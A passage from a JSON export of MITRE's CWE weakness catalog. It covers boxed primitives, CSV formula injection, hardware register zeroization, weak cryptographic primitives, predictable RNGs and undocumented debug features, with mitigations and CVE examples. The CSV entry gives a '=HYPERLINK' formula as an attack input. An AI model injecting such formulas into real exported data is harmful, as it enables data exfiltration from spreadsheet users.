Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations.","Extended_Description":{"xhtml:p":["Languages such as Java and C# support automatic conversion through their respective compilers from primitive types into objects of the corresponding wrapper classes, and vice versa. For example, a compiler might convert an int to Integer (called autoboxing) or an Integer to int (called unboxing). This eliminates forcing the programmer to perform these conversions manually, which makes the code cleaner.","However, this feature comes at a cost of performance and can lead to resource exhaustion and impact availability when used with generic collections. Therefore, they should not be used for scientific computing or other performance critical operations. They are only suited to support \\"impedance mismatch\\" between reference types and primitives."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The programmer may use boxed primitives when not strictly necessary."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance"],"Likelihood":"Low","Note":"Incorrect autoboxing/unboxing would result in reduced performance, which sometimes can lead to resource consumption issues."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use of boxed primitives should be limited to certain situations such as when calling methods with typed parameters.  Examine the use of boxed primitives prior to use. Use SparseArrays or ArrayMap instead of HashMap to avoid performance overhead."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Java has a boxed primitive for each primitive type. A long can be represented with the boxed primitive Long. Issues arise where boxed primitives are used when not strictly necessary.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Long count = 0L;for (long i = 0; i &lt; Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the above loop, we see that the count variable is declared as a boxed primitive. This causes autoboxing on the line that increments. This causes execution to be magnitudes less performant (time and possibly space) than if the \\"long\\" primitive was used to declare the count variable, which can impact availability of a resource."},{"Intro_Text":"This code uses primitive long which fixes the issue.","Example_Code":{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"long count = 0L;for (long i = 0; i &lt; Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"EXP04-J","Entry_Name":"Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1051"}},{"attr":{"@_External_Reference_ID":"REF-1052"}}]},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1236":{"attr":{"@_ID":"1236","@_Name":"Improper Neutralization of Formula Elements in a CSV File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software.","Extended_Description":"User-provided data is often saved to traditional databases.  This data can be exported to a CSV file, which allows users to read the data using spreadsheet software such as Excel, Numbers, or Calc.  This software interprets entries beginning with \'=\' as formulas, which are then executed by the spreadsheet software.  The software\'s formula language often allows methods to access hyperlinks or the local command line, and frequently allows enough characters to invoke an entire script. Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"CSV Injection"},{"Term":"Formula Injection"},{"Term":"Excel Macro Injection"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The weakness is in the implementation of a software\'s CSV export feature, in particular how it formats formula entries as the output gets flattened into a text file."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Execute Unauthorized Code or Commands"],"Likelihood":"Low","Note":"Current versions of Excel warn users of untrusted content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV.  Risky characters include \'=\' (equal), \'+\' (plus), \'-\' (minus), and \'@\' (at).","Effectiveness":"Moderate","Effectiveness_Notes":"Unfortunately, there is no perfect solution, since different spreadsheet products act differently."},{"Phase":"Implementation","Description":"If a field starts with a formula character, prepend it with a \' (single apostrophe), which prevents Excel from executing the formula.","Effectiveness":"Moderate","Effectiveness_Notes":"It is not clear how effective this mitigation is with other spreadsheet software."},{"Phase":"Architecture and Design","Description":"Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.","Effectiveness":"Limited","Effectiveness_Notes":"This mitigation has limited effectiveness because it often depends on end users opening spreadsheet software safely."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Hyperlinks or other commands can be executed when a cell begins with the formula identifier, \'=\'","Example_Code":[{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:p":"=HYPERLINK(link_location, [friendly_name])"},{"attr":{"@_Nature":"good"},"xhtml:p":"HYPERLINK(link_location, [friendly_name])"}],"Body_Text":"Stripping the leading equals sign, or simply not executing formulas from untrusted sources, impedes malicious activity."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12134","Description":"Low privileged user can trigger CSV injection through a contact form field value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12134"},{"Reference":"CVE-2019-4521","Description":"Cloud management product allows arbitrary command execution via CSV injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4521"},{"Reference":"CVE-2019-17661","Description":"CSV injection in content management system via formula code in a first or last name","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17661"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-21"}},{"attr":{"@_External_Reference_ID":"REF-22"}},{"attr":{"@_External_Reference_ID":"REF-23"}},{"attr":{"@_External_Reference_ID":"REF-24"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-11-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"}]}},"1239":{"attr":{"@_ID":"1239","@_Name":"Improper Zeroization of Hardware Register","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes.","Extended_Description":"Hardware logic operates on data stored in registers local to the hardware block. Most hardware IPs, including cryptographic accelerators, rely on registers to buffer I/O, store intermediate values, and interface with software. The result of this is that sensitive information, such as passwords or encryption keys, can exist in locations not transparent to the user of the hardware logic. When a different entity obtains access to the IP due to a change in operating mode or conditions, the new entity can extract information belonging to the previous user if no mechanisms are in place to clear register contents. It is important to clear information stored in the hardware if a physical attack on the product is detected, or if the user of the hardware block changes. The process of clearing register contents in a hardware IP is referred to as zeroization in standards for cryptographic hardware modules such as FIPS-140-2 [REF-267].","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Lack of hardware mechanisms to zeroize or clear registers in the design or specification."},{"Phase":"Implementation","Note":"Mechanisms to zeroize and clear registers are in the design but implemented incorrectly."},{"Phase":"Operation","Note":"Hardware-provided zeroization mechanisms are not used appropriately by the IP user (ex. firmware), or data remanence issues are not taken into account."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"The consequences will depend on the information disclosed due to the vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Every register potentially containing sensitive information must have a policy specifying how and when information is cleared, in addition to clarifying if it is the responsibility of the hardware logic or IP user to initiate the zeroization procedure at the appropriate time.","Effectiveness_Notes":"Unfortunately, data disclosure can occur even after information has been overwritten/zeroized from the digital perspective. Physical characteristics of the memory can reveal the history of previously written data.  For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree that even if the original data is erased it can still be recovered through physical characterization of the memory cells [REF-1055]."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a hardware IP for implementing an encryption routine works as expected, but it leaves the intermediate results in some registers that can be accessed. Exactly why this access happens is immaterial - it might be unintentional or intentional, where the designer wanted a \\"quick fix\\" for something."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-02-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1240":{"attr":{"@_ID":"1240","@_Name":"Use of a Cryptographic Primitive with a Risky Implementation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.","Extended_Description":{"xhtml:p":["Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of \\"primitive\\" can vary depending on point of view. See \\"Terminology Notes\\" for further explanation of some concepts.","Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time.","If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is \\"broken\\"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack.","Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered.  As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly.","If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences.","This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is primarily introduced during the architecture and design phase as risky primitives are included."},{"Phase":"Implementation","Note":"Even in cases where the Architectural phase properly specifies a cryptographically secure design, the design may be changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High","Note":"Incorrect usage of crypto primitives could render the supposedly encrypted data as unencrypted plaintext in the worst case."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review requirements, documentation, and product design to ensure that primitives are consistent with the strongest-available recommendations from trusted parties. If the product appears to be using custom or proprietary implementations that have not had sufficient public review and approval, then this is a significant concern.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":"Analyze the product to ensure that implementations for each primitive do not contain any known vulnerabilities and are not using any known-weak algorithms, including MD4, MD5, SHA1, DES, etc.","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"For hardware, during the implementation (pre-Silicon / post-Silicon) phase, dynamic tests should be done to ensure that outputs from cryptographic routines are indeed working properly, such as test vectors provided by NIST [REF-1236].","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"It needs to be determined if the output of a cryptographic primitive is lacking entropy, which is one clear sign that something went wrong with the crypto implementation. There exist many methods of measuring the entropy of a bytestream, from sophisticated ones (like calculating Shannon\'s entropy of a sequence of characters) to crude ones (by compressing it and comparing the size of the original bytestream vs. the compressed - a truly random byte stream should not be compressible and hence the uncompressed and compressed bytestreams should be nearly identical in size).","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-55"},"Phase":"Requirements","Description":"Require compliance with the strongest-available recommendations from trusted parties, and require that compliance must be kept up-to-date, since recommendations evolve over time. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Ensure that the architecture/design uses the strongest-available primitives and algorithms from trusted parties. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-54"},"Phase":"Architecture and Design","Description":"Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. As with all cryptographic mechanisms, the source code should be available for analysis. If the algorithm may be compromised when attackers find out how it works, then it is especially weak.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Description":"Try not to use cryptographic algorithms in novel ways or with new modes of operation even when you \\"know\\" it is secure. For example, using SHA-2 chaining to create a 1-time pad for encryption might sound like a good idea, but one should not do this.","Effectiveness":"Discouraged Common Practice"},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design can replace one cryptographic primitive or algorithm with another in the next generation (\\"cryptographic agility\\"). Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software; design the hardware at a replaceable block level.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Do not use outdated or non-compliant cryptography algorithms. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong [REF-267].","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a linear-feedback shift register (LFSR) or other legacy methods as a substitute for an accepted and standard Random Number Generator.","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a checksum as a substitute for a cryptographically generated hash.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted cryptographic library or framework. Industry-standard implementations will save development time and are more likely to avoid errors that can occur during implementation of cryptographic algorithms. However, the library/framework could be used incorrectly during implementation.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for the prevention of common attacks.","Effectiveness":"Moderate"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not store keys in areas accessible to untrusted agents. Carefully manage and protect the cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography algorithm is irrelevant.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Re-using random values may compromise security.","Example_Code":[{"#text":"Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value.","attr":{"@_Nature":"bad"}},{"#text":"If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value.","attr":{"@_Nature":"good"}}],"Body_Text":"While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-4778","Description":"software uses MD5, which is less safe than the default SHA-256 used by related products","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4778"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2019-3907","Description":"identity card uses MD5 hash of a salt and password","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3907"},{"Reference":"CVE-2021-34687","Description":"personal key is transmitted over the network using a substitution cipher","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34687"},{"Reference":"CVE-2020-14254","Description":"product does not disable TLS-RSA cipher suites, allowing decryption of traffic if TLS 2.0 and secure ciphers are not enabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14254"},{"Reference":"CVE-2019-1543","Description":"SSL/TLS library generates 16-byte nonces but reduces them to 12 byte nonces for the ChaCha20-Poly1305 cipher, converting them in a way that violates the cipher\'s requirements for unique nonces.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1543"},{"Reference":"CVE-2017-9267","Description":"LDAP interface allows use of weak ciphers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9267"},{"Reference":"CVE-2017-7971","Description":"SCADA product allows \\"use of outdated cipher suites\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7971"},{"Reference":"CVE-2020-6616","Description":"Chip implementing Bluetooth uses a low-entropy PRNG instead of a hardware RNG, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6616"},{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"},{"Reference":"CVE-2014-4192","Description":"Dual_EC_DRBG implementation in RSA toolkit does not correctly handle certain byte requests, simplifying plaintext recovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4192"},{"Reference":"CVE-2007-6755","Description":"Recommendation for Dual_EC_DRBG algorithm contains point Q constants that could simplify decryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6755"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1227"}},{"attr":{"@_External_Reference_ID":"REF-1226"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-1236","@_Section":"Test Vectors"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Terminology"},"xhtml:p":["Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences.","As of CWE 4.6, CWE terminology around \\"primitives\\" and \\"algorithms\\" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility\'s sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the \\"cryptographic system\\" would be AES-256-GCM with PKCS#5 formatting. The \\"cryptographic function\\" would be AES-256 in the GCM mode of operation, and the \\"algorithm\\" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the \\"cryptographic primitive,\\" because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives."]},{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Research_Gaps"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods and observed examples"}}},"1241":{"attr":{"@_ID":"1241","@_Name":"Use of Predictable Algorithm in Random Number Generator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device uses an algorithm that is predictable and generates a pseudo-random number.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"In many cases, the design originally defines a cryptographically secure random number generator, but is then changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"A true random number generator should be specified for cryptographic algorithms."},{"Phase":"Implementation","Description":"A true random number generator should be implemented for cryptographic algorithms."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a cryptographic function expects random value to be supplied for the crypto algorithm.","Body_Text":"During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead  of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"1242":{"attr":{"@_ID":"1242","@_Name":"Inclusion of Undocumented Features or Chicken Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.","Extended_Description":{"xhtml:p":"A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as \\"chicken bits\\". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might exploit these interfaces for unauthorized access."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Documentation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"The implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented."},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented \\"special access features\\" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory 